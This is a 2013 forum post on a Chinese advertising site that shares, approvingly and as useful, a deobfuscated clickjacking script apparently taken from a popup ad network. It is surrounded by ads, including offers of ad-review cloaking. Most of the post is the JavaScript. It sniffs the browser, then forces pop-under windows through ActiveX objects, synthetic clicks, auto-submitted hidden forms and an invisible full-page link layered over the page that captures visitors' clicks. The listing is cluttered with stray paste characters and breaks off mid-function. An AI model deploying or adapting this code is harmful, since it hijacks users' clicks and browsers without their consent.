AdvertCN - 广告中国

 找回密码
 立即注册

QQ登录

只需一步,快速开始

PropellerAds
Google-Bing-Mediago-Criteo开户
⚡️按条S5代理⚡️静态⚡️独享⚡️5G广告专用虚拟卡/U充值/高返点皇家代理IP⚡️#1性价比⚡️
Mediabuy⚡️玩家开户首选【鲁班跨境通-自助充值转账】FB/GG/TT❤️官方免费开户Affiliate 全媒体流量资源⚡️
Taboola/Outbrain /Bing⚡️一级代理开户投流-7*24h❤️人工在线【官方】❤️搜索套利买量投流开户独立站⚡️开户投放
⚡️AdsPower:安全不封号,高效自动化Google FB TK游戏代投⚡️E.PN 虚拟卡⚡️BINOM TRACKER 60% OFF!
比Adplexity还好用的Spy工具ADPLEXITY + ADVERTCN7200W全球动态不重复住宅IP代理虚拟信用卡+独立站收款
全球虚拟卡, 支持U充值各种主页、账单户、BM户(优势)⚡️TikTok企业户,bm户,账单户IPCola原生住宅IP⚡️$1.8/条双ISP
FB海外户、GG老户、TK加白老户PTM虚拟卡[全新卡BIN+高返点]FB虚拟卡⚡️消费越多返现越多最大欧洲Nutra网盟BA找量
高品质·稳定高速纯净IP FB个号1块一个TikTok2审户/老户/国内外端口/加白SX.ORG 高质量代理⚡235+ 地区
GG,FB,TK, 欧美源头, 欢迎合作❤️跨境债务催收/风险代理高权重Google老户[卖户+筛户等级] 海外斗篷・智能广告过审率高达 99%
DataImpulse⚡️纯净住宅代理仅 $1FB企业户海外户,授信户,TK加白户广告位出租8500万高质量住宅IP,助力各种需求
虚拟卡返佣1%,国内持牌机构   
查看: 17710|回复: 17

[FACEBOOK] 国内也有牛人啊。很有用的。

[复制链接]

126

主题

62

广告币

394

积分

初级会员

Rank: 2

积分
394

社区QQ达人

发表于 2013-12-17 15:03:03 | 显示全部楼层 |阅读模式
天星网ClickJacking点击劫持分析
9 E, j+ B$ I2 L, r& T$ Ghttp://www.21tx.com/ 天星网 + ^( J% f, e" w; L& n* V6 V  [  U
我得联系联系作者
. A6 w: `/ C5 g% \1 s7 s刚好打开这个站,发现第一次点击会弹窗,然后就不会,清除下COOKIE,又继续了,然后查看源代码,也没什么奇葩的。
" p4 Z# r( N# q9 ^1 P' d  qhttp://www.lxting.com/script/popup/v1_min.js
  W5 t$ o2 d9 m( W& `9 F: k
$ E3 H9 T) b# B这个是锁定到底JS脚本,
# [4 D5 B, n2 O" \解密后的代码
  1. (function() {
    ) S& i6 L; X4 _4 s: `7 s" v0 o
  2.     var aa_url = window.ytpp_url;
    " ?$ g% z7 C( w- e# I$ x( S
  3.     var ua = navigator.userAgent; - L5 A* _( K4 u, }4 E
  4.     var form_div = document.createElement('div');
    0 B/ R' }0 f4 _- q# E9 w
  5.     var form_pd = 0; / D; U! I, t, ^/ q9 `0 @: ?$ P
  6.     var browser = { % V& o1 I+ i& d- q" t4 M
  7.         ie: /msie/i.test(ua),
    ! R, l/ l1 m; l. _. Y/ z
  8.         ie6: /msie 6/i.test(ua), # m! T8 B# b" W/ c
  9.         ie7: /msie 7/i.test(ua), % e2 n) @( a! [" I1 U
  10.         ie8: /msie 8/i.test(ua),
    9 g# T8 t+ f# o; M
  11.         ie9: /msie 9/i.test(ua), ) R8 ]" a# b; _( ?- m( {
  12.         360 : /360se/i.test(ua),
    * y/ w! Z* a2 r" K  s0 R" W
  13.         sogou: /;?se.+?MetaSr/i.test(ua),
    7 H, _" J, t1 \* y7 N6 W
  14.         maxthon: /Maxthon/i.test(ua),
    2 u  T& [  _& I- P' X, x; g
  15.         tt: /TencentTraveler/i.test(ua),
    " W9 Q- ^  T! p! H0 E4 b7 t
  16.         ff: /firefox/i.test(ua), , O8 F, [' x/ R: `
  17.         webkit: /AppleWebKit/i.test(ua),
    2 H' b; n9 f8 u1 T) M
  18.         opera: /Opera/i.test(ua), 1 [  ^7 d8 P$ ^! @% A
  19.         qqbrowser: /QQBrowser/i.test(ua),
    " G1 C0 w) b) J# G; O8 j1 \% g& H
  20.         cr: /chrome/i.test(ua), 8 p/ [3 O6 w1 `4 a5 H" L  B
  21.         gg: window.chrome, 5 p& S3 e5 |% l3 B+ i3 A8 C/ l
  22.         theworld: /Theworld/i.test(ua) ! L) z. u7 p0 S! o; q
  23.     };
    / g0 Y( [* V) E( F
  24.     var _setting = ""; $ F( r9 c, i9 v, s
  25.     var _ct = 0;
    6 q0 f; O% r8 w' L
  26.     var _le = 0; % @: A+ Q8 W- G8 l  _
  27.     var _pd = 1; + y/ W0 E* F& k5 W( H
  28.     var _pd2 = 0; / q' G! a; R2 y3 n0 v$ N* h/ ?
  29.     var _pc = 1; ; d4 c  `1 N  q0 K( V) @
  30.     var _pc2 = 1;
    9 \, U9 x8 n2 g& h. D
  31.     var _pco = 0;
    1 M! v# W4 Y# p3 F4 v
  32.     var _pta = 0; 4 r4 c# A# P: N- v7 T
  33.     var _ptb = 0; 2 L) t4 P# W0 F' ?% z
  34.     var _pt2a = 0; 8 S" e+ o( U2 q9 p0 `
  35.     var _pt2b = 0;
    , d& g$ ^- L; ~9 J
  36.     var _pt3a = 0; / V# |& y1 Q5 @
  37.     var _pt3b = 0; 1 h6 R* R7 m" X( m
  38.     var _pt4a = 0; " I/ r; P. M* j* T
  39.     var _pt4b = 0;
    1 G5 K. d  w7 j+ x- E1 b2 m9 e
  40.     var _pt5a = 0; 3 j% K& t1 k- Y" R* k
  41.     var _pt5b = 0;
    ( R% M( V. E( `' a+ Z( A  |
  42.     var _pt6a = 0;
    3 F2 l  t9 t( y
  43.     var _pt6b = 0; / y  q) o2 N9 ~" S0 G
  44.     var _pt7a = 0;
    5 G" j1 q0 N7 Z- g: g6 y) b2 c
  45.     var _pt7b = 0;
    1 |0 N1 l* j- T7 g5 K4 k. s& t
  46.     var _pt8a = 0; $ v' m( M5 A+ ~# e0 ]( P- o/ m
  47.     var _pt8b = 0;
    2 p! |0 j7 o4 a3 X2 a
  48.     var _pt9a = 0;
    7 b& V0 ~8 B3 `7 n. \. m& a
  49.     var _pt9b = 0; 4 U" Y5 ~% ?; p  R  {+ T
  50.     var _pt10a = 0; * Y0 q2 `8 ]8 K# C- o' P3 T5 q
  51.     var _pt10b = 0;
    5 o5 ?1 C$ m1 Z4 {+ a* D& y
  52.     var _po = 0; & a; G5 Z' W: N8 T/ O
  53.     var _poo = 0; : p4 ]0 s8 g7 Z6 ?1 l5 U2 Y, ]! e" Z
  54.     var ckn, ckt; $ b/ b; e8 B0 C% j3 l
  55.     var ads = 0; ' W6 C, J- E! {" q0 A( j0 M4 ?+ G/ ^
  56.     function b(w) { 6 o. u1 B0 ]) {/ ~8 e# a
  57.         var s = w + "="; ! T3 B4 P! B( P# w
  58.         var r = ""; 2 z6 Q0 d. K% Q; Q# R0 h
  59.         var o = 0;
    # ?2 V; \" I  K' j7 \
  60.         var d = 0; + v! d6 f! J. k. }* q8 V6 ^
  61.         var p = document.cookie;
    9 v5 H4 `: j4 r
  62.         if (document.cookie.length > 0) {
    $ x* U$ O2 k- }
  63.             o = document.cookie.indexOf(s);
    0 C/ n% ?% ]' e( X. ~, H' h& o) B
  64.             if (o != -1) { : N" H1 C7 {& G* x) y
  65.                 o += s.length;
    " r, v) |7 B/ B7 T' r* a
  66.                 d = document.cookie.indexOf(";", o); ! B5 |0 ]: V5 X9 j
  67.                 if (d == -1) d = document.cookie.length; % m4 Y/ `7 w- P1 O
  68.                 r = unescape(document.cookie.substring(o, d))
    7 w, m/ p2 s( K$ O9 [
  69.             }
    0 T0 Y. b: j' }+ I! n5 N
  70.         } ' b# L6 N. Z" V* B
  71.         return r
    8 |1 c6 f( P3 @0 Q5 Q3 G: I
  72.     };   t4 E# b4 U/ \! j+ B2 }
  73.     function p(w, p, v) { 4 T5 F9 D3 l% e2 {8 X# p
  74.         var t = 30; - @- E3 u# b" v: |% u/ V' O
  75.         try {
      J( @% f2 ]4 ^: T; t( s
  76.             t = parseFloat(p) * 1 ' C/ W: P; ?# n
  77.         } catch(e) { ! G- d# X! t, Y
  78.             t = 30
    9 q* r9 S5 {2 j, X- r
  79.         }
    + v! |/ r% \& m( l0 X: N/ H$ j
  80.         if (isNaN(t)) t = 30;
    ' [+ N" }- e6 V5 ?
  81.         var then = new Date();
    8 e% t1 B) c6 `$ x! v1 I; O- ^
  82.         then.setTime(then.getTime() + t * 60 * 1000);
    2 i% H, y- z) a: F: j  I$ L
  83.         document.cookie = w + '=' + v + ';expires=' + then.toGMTString() + ';path=/;'9 r9 V0 g. b$ Y! C
  84.     }; % ~' ~; X  F( v6 `8 W7 u# F
  85.     function init() {
    . H1 \6 G. D: d
  86.         _setting = ytpp_sti; + ]' o% w" ~& w$ K
  87.         if (getp(_setting, "CT")) {
      r& _  k( z1 |4 r1 X
  88.             _ct = getp(_setting, "CT") / n) T! y( J3 j8 x
  89.         }
    7 E+ \! S% T, s  F8 w- b1 o* w$ [
  90.         if (getp(_setting, "LE")) { 2 [9 ]6 @2 H3 {9 v* L
  91.             _le = getp(_setting, "LE")
    2 _; V/ \! u" ]8 r3 G6 K
  92.         } - i# x8 ]: t/ Q/ C+ J$ X: n; g+ h
  93.         if (getp(_setting, "PD2")) {
    * f/ C/ w1 {$ H6 ~( ]/ z
  94.             _pd2 = getp(_setting, "PD2") 8 L- L' i) S# m4 d: }
  95.         }   E' \, i, ?7 K) ?+ m4 I4 d! D
  96.         if (getp(_setting, "PC2")) {
    & r! j( H5 l/ Y1 h: U  Z
  97.             _pc2 = getp(_setting, "PC2")
    . [9 F. z1 E6 }% u
  98.         } 2 Z( a* t% h" D4 L+ f% c+ C
  99.         if (getp(_setting, "PCO")) { / L8 ^3 i8 a; N( t0 A0 X
  100.             _pco = getp(_setting, "PCO")
    9 R* S( W/ r$ h8 k
  101.         } ( ~- L& [" e( _
  102.         for (var i = 1; i <= 10; i++) {
    : |8 ?4 @. B$ V) T7 ?! E8 J4 S0 z7 d
  103.             var n = i == 1 ? "": i;
    ! _6 l( o5 T& H- D3 K
  104.             if (getp(_setting, "PT" + n)) { : r# x" R! f* _: Q8 j' b
  105.                 eval("var _pt" + n + " = getp(_setting, 'PT" + n + "').split(',');"); 0 e! z7 o- z1 T/ a) ]4 h) g
  106.                 eval("_pt" + n + "a = _pt" + n + "[0];");
    ' N  x% r2 L! J! l) \' P
  107.                 eval("_pt" + n + "b = _pt" + n + "[1];") 2 v, |# J, S+ s" W* W5 O* y
  108.             }
    8 q$ ?7 O2 E+ A* U% h6 v
  109.         }
    $ O# t& d* i# E  x9 z* d' G
  110.         if (getp(_setting, "PO")) { 0 e2 f: V- k4 w& ?  J
  111.             _po = getp(_setting, "PO")
    # M3 R) S; L* x4 L4 \4 o6 Y8 v
  112.         } ' i9 W  k( ?# A: X, _( M% H
  113.         if (getp(_setting, "POO")) {
      q8 \& {( ~' _0 Z
  114.             _poo = getp(_setting, "POO")
    # q" _2 Q* _/ ^0 a
  115.         }
    0 h$ M; _. C& J5 p8 l
  116.         if (_pco == 1 || _poo == 1) { ; p- P# g" S$ D/ s. s/ j: R
  117.             if (_poo == 1) {
    - q; j0 ~4 r& o/ u7 a; `! O
  118.                 _pco = 0
    , c7 t6 v' k$ P1 h) ]  }/ E& K& Z! B
  119.             } else {
    8 H2 y. u* o; {8 B  L
  120.                 _poo = 0
    ) g# Y5 o/ s& u6 N& f
  121.             } 5 r/ l' N" p0 J; c7 Q1 z' `# w
  122.             _pd = _pd2 = _pc = _pc2 = _po = _pta = _ptb = 0;
    # R) |. ^5 A( o) c! ?
  123.             for (var i = 2; i <= 10; i++) { - }7 o( K7 g, o2 _& [# o- r
  124.                 eval("_pt" + i + "a = _pt" + i + "b = 0;") ; l$ w: H4 w4 W6 i6 _9 B
  125.             } 6 o& `6 Z# p7 s0 e- g
  126.         }
    " z" J- y1 r: V/ ~7 {
  127.     };
    % D; f. D8 z8 W- K+ l7 G' E
  128.     function getp(s, p) { ' r  H6 n# j! @; x
  129.         var i = s.indexOf(p + ":");
    * e" J0 r% n; }  Q) \: H9 @
  130.         if (i >= 0) {
    / K: G9 ~; p. c6 |2 c8 Y
  131.             return s.substr(i + p.length + 1, s.substr(i).indexOf(";") - p.length - 1)
    ! l) H) ~- D! R# @  n1 S$ s  U
  132.         }
    " Y2 o- @9 K0 i/ X7 `4 O
  133.     };
    & a+ d3 T4 J7 u3 h2 _# }4 m
  134.     function event(e, event, func, act) { ) @7 j& U' p) s  [# t
  135.         if (browser.ie) e[act === undefined ? 'attachEvent': 'detachEvent']('on' + event, func); % b% b: y! N! @3 B9 [
  136.         else e[act === undefined ? 'addEventListener': 'removeEventListener'](event, func, false) + \( ~5 y' C0 ^# W0 x
  137.     } 0 T' }" v4 ?( p( a' ^3 j& ^
  138.     function pop(url, param) {
    0 k: J4 k# N* t2 o2 f
  139.         if (!document.body) { / A7 M* F  Y* Q2 e7 g1 {4 ^
  140.             return setTimeout(function() { 2 _* q% ~: y7 O3 P$ |
  141.                 pop(url, param) 6 _3 I) l* }% H
  142.             }, ( o; o5 e0 X) l8 w
  143.             13) $ t: D: }, h- a3 X3 s$ d
  144.         }
    9 J5 `: _! y8 V7 ]) F4 i
  145.         try {
    ; {+ \0 Y; ]1 f1 d
  146.             if (browser['cr'] && browser['gg']) { " p% m/ F8 s! g0 c0 ~9 ]2 D
  147.                 try { 8 _5 n& A2 K9 w8 D' g! D& I* y8 @
  148.                     hrefopen(url)
      g$ u/ K! D# X
  149.                 } catch(e) { + f7 d* X, g" r- ^
  150.                     a_pop(url)
    2 p1 u' w& \0 N# A) M
  151.                 } & \# K* D  s0 d) u% G
  152.             } else if (browser['webkit'] && browser['maxthon']) { 3 F' F- `/ H# x" |3 f
  153.                 if (!func(url)) {
    0 A6 z- w% C$ I: X# F. D
  154.                     try { ' U/ B3 V4 H1 ^7 A5 s- a
  155.                         form_pop(url);
    8 w- w. S- r0 r" s/ E
  156.                         a_pop(url) 0 U8 }/ z3 p4 \5 V8 ?) A5 F' }
  157.                     } catch(e) {} 6 z/ M, g+ m' }
  158.                 }
    7 h* X7 i8 e/ N9 z1 H4 U
  159.             } else if (browser['tt']) { / @/ K" r/ `3 E
  160.                 try {
    / q( [8 u) e* [# E/ u2 G) ~% G% c+ P. X
  161.                     object_pop(url) & ~! K; r* t& T) T% c
  162.                 } catch(e) {
    " s9 ^/ f+ D1 g  C" o$ w
  163.                     a_pop(url) " B. C$ s! }$ w  l4 {
  164.                 } 6 n  e& X- O, G1 |( i4 b
  165.             } else if (browser['sogou']) {
    8 ?0 j) N# V$ f" y
  166.                 if (!func(url)) {
    4 E1 O, z! F; k8 G2 B+ v5 ^) x
  167.                     try {
    2 B/ e4 ]. E' v% d# I
  168.                         a_pop(url)
    . i; u: p, j3 J6 o' O- e( ], l& l
  169.                     } catch(e) {}
    3 b: E9 `8 ]' ^6 F
  170.                 }   @, r; F0 l* o: v* X) G
  171.             } else if (browser['webkit'] && browser['qqbrowser']) { 5 M4 \- S+ g; K$ I4 l
  172.                 if (!func(url)) { + m& u* m. g# z- I5 c- _) T
  173.                     try { # O5 H/ K+ c7 I$ ^/ @
  174.                         form_pop(url)
    1 m: R" Y" c, Z- C  I6 v& ], s
  175.                     } catch(e) {
    2 ?( Y% w- e- _  b( J3 r, `
  176.                         click_pop(url) 2 f& m5 D: f( g& \+ d+ P
  177.                     } " A- I# {/ c7 g7 L) n6 R
  178.                 }
    * w* H, r8 R; z# `
  179.             } else if (browser['webkit'] || browser['opera']) { " o3 r" b! v9 J# `# `
  180.                 try { 0 b4 J8 s4 ]8 U" O! P
  181.                     form_pop(url); : Z1 S$ {- X" L# w3 z- N
  182.                     a_pop(url) 7 C( @+ h& v7 q! Z! g
  183.                 } catch(e) {}
    ' q5 Q9 q. o1 m7 N7 ^* D
  184.             } else if (browser['theworld'] && browser.ie6) { ) v% n) x5 \, s, Z( D6 N
  185.                 if (!object_pop2(url)) {
    % k, p& D) u) r8 h; q/ t2 W3 r
  186.                     a_pop(url) - o0 T' `5 A2 ]. ~
  187.                 } & `9 @5 t8 a6 D0 d. l+ G/ z; b
  188.             } else if (browser['theworld'] && browser.ie8) { : I$ ~) f, q/ k: a& a2 ^
  189.                 if (!func(url)) { & O+ F4 w; f3 @) [1 A$ X! _% N
  190.                     try {
    6 t- V4 D2 ]  y" T- L1 C
  191.                         object_pop(url)
    , q' T* d/ Z' H$ ]
  192.                     } catch(e) { ' }8 L( L, \  ~% Q5 {3 A# T; B8 O' N" D$ J
  193.                         click_pop(url)
    . r0 r$ A- n* p  H- f
  194.                     }
    9 E& o, w' A: N- e; r
  195.                 }
    " w- ~' b+ }( _" m  }, J! r7 U
  196.             } else if (browser.ie6) {
    % \; T0 f% @6 ~7 t
  197.                 if (!func(url)) {
    5 q) K  L0 j) D+ x
  198.                     object_pop2(url) 2 ]3 R& v- ~& i: C  d" e4 ~% N
  199.                 } . b9 W* E0 W  E  ]" Z8 A0 g0 k& K
  200.             } else if (browser.ie8) {
    , C  ?3 X( A: a
  201.                 if (!func(url)) { 3 d* G: y7 D, u! i7 M! D% R1 Z! [
  202.                     try {
    5 K# G6 a, T0 p. f2 q6 D* Y+ ~
  203.                         object_pop(url)
    5 B' |  I. Z& E6 ?3 m1 @  n9 B" ]1 n
  204.                     } catch(e) {
    # O4 X6 s: _& h* Y( J
  205.                         document.onclick = function() {
    # j% `: ^* Y  @( r# N9 \, t
  206.                             func(url);
    - ^# S% @; |% \' s
  207.                             document.onclick = null; Y$ y6 h% ?& E6 Y& D
  208.                         } & D$ w' J8 |: d
  209.                     } 3 @  m: k. b- N* ~
  210.                 } * Q2 W$ U0 ~$ v. V! |1 k  n% ]
  211.             } else if (browser['ie']) { # D' Z1 A2 {* \3 d
  212.                 try {
    3 w& a6 X+ J( B2 p5 J# l0 \1 M; ]/ {
  213.                     object_pop(url)
    % q3 j, j( P- `% s% n# o8 i" D- n
  214.                 } catch(e) {
    " ~: `, m$ a/ f! H& d+ L/ J
  215.                     click_pop(url) ! b1 Q. c; b4 _  G2 u
  216.                 } 2 q# s" c! T3 @- Y
  217.             } else if (browser['ff']) {
    % m' l( ?5 a3 T2 \- ?9 l0 }$ p
  218.                 if (!func(url)) {
    % X& c5 _! V1 y; B3 {4 j8 Q
  219.                     click_pop(url) 6 c1 }! m; f0 N0 E& Q2 Z
  220.                 }
    0 S0 j3 j# w& e
  221.             } else {
    % _4 L9 C% N) s- U2 _0 Y" G+ S
  222.                 if (!func(url)) {
    ! y, I- Q$ [, k  C( r9 q2 S
  223.                     click_pop(url) 1 G4 T( a! U  i
  224.                 } & n, e0 I" I# q
  225.             } : ?# r! p( u+ Z( {" @1 Y) B
  226.         } catch(e) {
    # L  V" J; q, s, S. B
  227.             if (browser.ie7 || browser.ie8 || browser.ie9 || browser['qqbrowser']) { % W- I2 k2 [! h! `$ T6 i5 f
  228.                 click_pop(url) : ~0 `1 _5 m: ?5 _3 ~6 W! i
  229.             } else { + v* i! J7 j+ t
  230.                 a_pop(url)
    8 R' X3 R6 |: e9 P( d
  231.             } / G7 J2 n) k4 g0 [6 B
  232.         } - y1 f" V5 ^: W8 a$ o" @
  233.     } # _' z$ W3 J$ N
  234.     function object_pop(url, param) {
    ' H' A9 D( d0 [& [9 R8 o3 z( a
  235.         var object = document.createElement('object'); * g4 d& X" g: i
  236.         object.setAttribute('classid', 'CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6'); ( x. }+ V! E0 Q" Y# i0 N
  237.         object.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;'; & A4 n% i; E$ O0 {# ]( S
  238.         append(object); $ {: z! M6 ?; _: y9 f$ N
  239.         object.launchURL(url); ' Y9 K: W0 r2 Z3 [
  240.         ads++; ' }2 j0 E* I' S0 j& a8 J
  241.         p(ckn, ckt, ads) # H1 m0 v( `; n4 O6 u8 U
  242.     } # j5 C' O4 J. f3 _
  243.     function object_pop2(url, param) { " n8 ^  i6 e/ S
  244.         var object2 = document.createElement('object'); 2 M- y  u8 x3 e0 T% n( S& I
  245.         object2.setAttribute('classid', 'clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A'); ( e7 p7 }4 h; o) U2 t. l' Q( L
  246.         object2.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;'; , U0 A8 n- Y7 Z
  247.         append(object2);
    7 m( G' S/ ^( ]* r4 ?9 q( r% m
  248.         for (var i in object2) { 1 Y8 E7 p) y7 X% b) \& {2 }
  249.             try { (function(o) {})(object2[i])
    ! C4 e' j" @4 C& q
  250.             } catch(e) {}
    ( `: y( U0 z3 b6 O
  251.         }
    7 B( D$ |4 R+ X! i
  252.         setTimeout(function() {
    * J+ }2 P" g# |
  253.             object2.DOM.Script.open(url, '_blank', '')
    * O  m. V' O' ]; e3 u
  254.         },
    ( U1 p  a) W9 E0 H0 }/ g1 C) f3 S; C
  255.         500);
    ' \  O! ?- I. @# G) z# I
  256.         ads++; ( k$ h6 D' M0 u) s. Z
  257.         p(ckn, ckt, ads)   a4 B$ e2 y0 m8 I2 i
  258.     }
    " \% V; B. B% v0 W( |
  259.     function append(e) { ( b, t3 @- |4 M& B. h/ m$ z
  260.         for (var t in {
    7 I! W8 R& n# f! W& \% A
  261.             body: 1 , u, m0 k3 ^) ?7 V
  262.         }) { + U( ]9 W5 b) X6 \; N8 u
  263.             var ele = document.getElementsByTagName(t); ) {  a4 ^5 o3 F
  264.             for (var i = 0; i < ele.length; i++) {
    ' h7 Q$ b3 e9 e0 }. S' Q% Y9 ~
  265.                 ele[i].insertBefore(e, ele[i].firstChild); 3 r) i& r4 ]% t- d
  266.                 return6 Q7 i) V4 X6 M
  267.             } . E% L- o5 h; _0 Y* E. D
  268.         } - c8 y: K* Q, Y7 f# N& X
  269.     } 0 r) G+ Q. m, M) S$ Z' @( ?
  270.     function hrefopen(url) { # ~/ W! F& x; p9 T% Z6 h
  271.         try {
    $ T1 Y6 E8 @7 q/ Q* e, F
  272.             var c = document.createElement("a");
    . Q3 N6 `, b$ H
  273.             c.setAttribute("href", url); . A: l! O' _( d2 x+ b# d0 B7 z; ?5 @4 B
  274.             c.setAttribute("target", "_blank");
      o8 A( V3 K* j1 z4 U' q4 R/ i7 I5 t
  275.             c.setAttribute("style", "display:none;"); ; E$ [+ i, J* Q
  276.             var b = document.createEvent("MouseEvents");
    - P5 @" ^, ]/ j3 b. D
  277.             b.initMouseEvent("click", false, false, window, 0, 0, 0, 0, 0, true, false, false, false, 0, null);
    9 `1 P8 z/ s: `  c. i& l6 n: w
  278.             c.dispatchEvent(b);
    0 H, s* z9 }3 d' c3 {; r( v
  279.             ads++;
    ) E+ u4 H/ G% |  a
  280.             p(ckn, ckt, ads);
    . i0 F! R+ a8 o1 e: F$ M3 o2 w9 p
  281.             return true  M0 T/ x7 D" `5 Y
  282.         } catch(q) { 0 T3 G( U4 u( x; P
  283.             return false2 A5 ]! Q# T1 b! W: [( n& ~. ^. |/ a
  284.         } : {$ V) E2 m0 H1 K/ e
  285.     } 8 P$ S) T: Q. M
  286.     function form_pop(url) {
    ; e4 f5 Q% o9 J% \& e
  287.         form_div.setAttribute('id', '__unionsky_push_d_object_box__');
      ]. ~! C, X4 q, I4 x* n3 D- \, l
  288.         form_div.setAttribute('style', 'display:none');
    # n$ u6 f0 }; u" N$ g$ Q
  289.         var form = document.createElement('form'); % t3 P' i8 ?& _  \- |
  290.         form.setAttribute('action', aa_url);
    + }" f! _# |1 R2 n' \: S  U2 H
  291.         form.setAttribute('method', 'post'); * E* D! s# _) @) ^
  292.         form.setAttribute('name', '__unionsky_push_d_form_box__'); ( P9 N: D7 ~- M% @8 a
  293.         form.setAttribute('target', '_blank'); 7 [# D; f7 }  i- ~
  294.         form.setAttribute('style', 'display:none');
    8 [8 q- m* v( B' z( u8 T
  295.         var sinput = document.createElement('input'); / S' b8 K" s/ [) d2 V: T7 y
  296.         sinput.setAttribute('style', 'display:none');
    ( I8 ?6 l" a- [/ C& d
  297.         sinput.setAttribute('type', 'submit'); 4 `, T2 }+ d- u' M. \4 x' P; Y$ h
  298.         sinput.setAttribute('id', '_sumit_2app');
    1 b) h9 I5 p; z/ ?6 x% O$ S
  299.         form.appendChild(sinput);
    / _8 g% _( W7 _6 \$ d
  300.         form_div.appendChild(form); 7 R" G8 D) j) F3 U
  301.         append(form_div);
    5 B! G8 ~2 l: g
  302.         var unionsky_from = document.forms["__unionsky_push_d_form_box__"];
    . x  i* f# F5 }; `
  303.         try {
    & J" q, r0 R( l) b
  304.             document.getElementById("_sumit_2app").click() * d8 K0 n4 R0 F, R. N6 \* Y) L
  305.         } catch(e) {
    . S4 ]. e' ^: j' m% {
  306.             event(document, 'keyup', 6 E. O2 d. S1 Y* j# T1 O0 V' {+ r
  307.             function(e) { 9 K, u4 i3 X7 ]" @
  308.                 if (document.getElementById('__unionsky_push_d_object_box__') == null) {
      b( X6 M2 I$ t5 y0 H# c% L& O1 r; n
  309.                     return1 Q( {' C+ v" |  O* E' |5 c
  310.                 };
    ! P* @! B/ o  N2 M
  311.                 e = e || window.event;
    3 i4 O5 o4 {/ O2 q1 \9 j
  312.                 e.canceBubble = true;
    9 f4 I# z* m! O
  313.                 event(document, 'keyup', arguments.callee, true); 7 U8 z' _0 z8 b; `  P- g0 d
  314.                 form_pd = 1;
    6 v/ R2 }2 B3 l, i
  315.                 unionsky_from.submit() 2 P8 p9 K, {/ h# t& }1 ~" [
  316.             })
    5 U' T# g; Y7 I, [3 E$ t# W
  317.         } 3 y0 G3 c- H" e& s9 e! i1 |6 Y5 Q
  318.     }; + q1 C3 I* t; H4 Z/ m) y
  319.     function click_pop(url, param) {
    * a& k3 |0 S- _! \
  320.         event(document, 'mouseup',
    ) C. E0 l+ c1 E+ n( m0 e
  321.         function(e) {
    5 h3 ?0 N0 H9 `% `
  322.             e = e || window.event;
    ( b  N- H1 a* b/ W0 C! q* q6 D
  323.             e.canceBubble = true; 9 x2 x* k; H8 x% E7 z8 P2 w" D' ^( P4 i
  324.             event(document, 'mouseup', arguments.callee, true); ( {* E- _& {( \1 u* m. x- T
  325.             func(url, param);
    8 x4 u* T; }. Y, ]. |' r2 U
  326.             ads++; & h% N) ~5 f9 D
  327.             p(ckn, ckt, ads)
    $ ~% w! u! k" S1 u/ h4 j# Y* }7 N+ A
  328.         })
    5 l; k5 a; W+ N8 q3 P1 L- V
  329.     }; ; m( {/ R. z2 T
  330.     function a_pop(url) {
    - i3 R! V" M4 s/ F0 A  P, `. n5 R: y
  331.         if (ytpp_plid == 166028) {
    4 {: h! s9 j4 N$ ^( Q" Y% n
  332.             return  G7 s0 R( x& R" f6 d/ b) c
  333.         }
    , P- F' d/ _4 y- _! u- {$ ~* ?
  334.         if (!document.body) {
    7 T) C; A( y' [& E
  335.             return setTimeout(function() {
    8 a* {" P7 e& Y3 f# Y2 s. o
  336.                 a_pop(url)
      f2 x* G! J/ x! g; ^. ^3 k4 T
  337.             }, 3 `( X8 U4 ?; k& J0 [, l+ l
  338.             13) # S% F- u. Q* X& g6 Z$ Y5 F
  339.         } 3 ?+ R5 K) L& |) A
  340.         var a = document.createElement("a");
    4 b1 d! f0 S. g1 h% o8 Y
  341.         a.href = url; 0 ?: P$ ]4 j/ L
  342.         a.target = "_blank";
    7 x* l' [. r$ G2 x+ E+ m  `  E
  343.         var div = document.createElement('div');
    0 {# M3 g5 u" K7 {* @
  344.         div.style.backgroundColor = '#fff'; ( N7 i$ g4 B! |; x$ P: O( d
  345.         a.appendChild(div); 9 x/ ~7 V! ^( P, e7 ]( e
  346.         append(a); ( O+ ~  g; A0 G0 {
  347.         var as = a.style; " K) t7 z2 P/ ]0 T/ D
  348.         as.position = "absolute"; ! [* Y) o, g. ]
  349.         as.zIndex = '2147483647';
    1 H, E& D4 ~5 E/ _# g$ t) l
  350.         as.display = "block"; - x1 n3 b5 b+ j( f* O% Q; N
  351.         as.top = "0px";
      W2 L  [& `" `4 T! v2 ~
  352.         as.left = "0px";
    8 y4 a8 t0 |/ ^' i
  353.         as.cursor = 'default'; ; l* r. l6 S! z. ^# t8 ^
  354.         as.opacity = "0"; 8 J( p& X8 n' K: C
  355.         as.filter = "alpha(opacity:0)"; " q$ u- w  x" b
  356.         var m = setInterval(function() {
    7 {# Z  y: f" v  q) l% [  x$ d
  357.             if (form_pd == 1) {
    & N7 m5 p: R4 |( {! s, L
  358.                 a.parentNode.removeChild(a);
    0 {& z" f% i. D7 b% x3 t$ s
  359.                 clearInterval(m); - t( M+ x' h3 N' z5 I  E" I- }
  360.                 return
    / c7 ?# d7 {6 X9 L3 D' |1 Z' x
  361.             }
    3 l. \1 ]8 K- q- m1 P& U- d
  362.             a.style.zIndex = '2147483647';
    7 _5 }# h3 y& t
  363.             var d = (document.compatMode.toLowerCase() == 'css1compat') ? document.documentElement: document.body;
    4 \% e& w3 L2 |& W
  364.             a.style.top = Math.max(document.documentElement.scrollTop, document.body.scrollTop) + 'px';
    : s( x$ J' ^3 z) u/ ~% \
  365.             div.style.width = Math.min(d.clientWidth, d.scrollWidth) + 'px';
    ' c3 j# n: Z- y" x) s4 H
  366.             div.style.height = d.clientHeight + 'px'; 0 J- q' `- g8 Q: r+ ]$ V0 W
  367.             if (browser['ie']) {
      `! e1 E. f' z+ Z0 \$ m
  368.                 try { $ N9 O5 U2 P7 c
  369.                     var divs = document.body.childNodes; 5 `7 ?, B$ s( z' A) \
  370.                     for (var i = 0; i < divs.length; i++) { " s% i2 F4 K% h8 f" J
  371.                         if (!divs[i]['style']) {
    $ C1 @: {& t3 l5 o) M, G. m' P
  372.                             continue- p8 d5 N% F" {) Y
  373.                         }
    ) n$ x1 h* J0 u2 i- l2 T5 d6 _9 f
  374.                         var _i = parseInt(divs[i].style.zIndex); 0 J6 R! S: [; ]9 f$ ~  E$ r7 S: e$ E! {. Q
